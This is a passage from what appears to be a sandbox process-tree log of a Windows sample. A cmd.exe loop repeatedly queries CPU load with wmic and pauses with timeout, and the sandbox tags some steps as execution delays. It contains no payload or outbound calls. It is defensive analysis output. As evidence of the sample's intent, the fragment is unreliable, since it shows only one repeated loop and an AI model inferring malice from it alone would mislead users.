  timeout /t 1
  2⤵
  PID:4712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3168
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1040
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3984
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1104
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4756
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2484
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2188
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1092
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1212
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3032
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2688
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:860
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:556
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3840
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3388
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3016
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3704
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1112
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4268
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4504
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1120
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:764
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2444
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4160
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2448
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2564
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4320
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5072
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3252
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2208
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4248
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1328
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3296
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1184
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2476
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3748
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2524
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3364
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4844
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1244
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4352
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4044
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1752
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3928
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4656
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5104
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3208
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4464
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3408
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2968
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2320
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3616
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4880
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1100
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4888
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4756
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1912
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2484
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1212
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2688
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2932
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:860
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:556
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3172
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3672
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1776
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3628
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:396
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1056
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3676
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4820
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4724
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:764
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5016
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1632
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4320
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5072
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4616
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2208
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3236
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1328
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4136
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3068
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4772
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2408
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2524
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2608
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1960
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4832
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3180
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3576
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3928
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4348
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5104
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2336
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3208
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3780
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4712
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4784
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4140
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4536
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2012
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2228
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1040
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5012
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4716
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:428
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1440
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4164
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3152
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2844
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3124
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:412
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2116
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1572
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3672
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3628
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1916
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3688
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2136
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4640
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4936
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4724
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3040
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1632
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:132
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4312
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3988
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2536
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1380
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4132
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2140
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3880
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1324
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3108
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2436
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3604
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1020
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3756
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4988
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3240
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1704
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4656
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3272
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3952
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1504
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3556
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1296
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3008
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3936
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2320
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3080
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4324
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2400
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4736
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1404
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1104
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:480
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4164
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2032
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5004
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4764
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2948
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4336
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2688
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:412
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:860
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1668
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2628
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1108
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2036
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1112
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
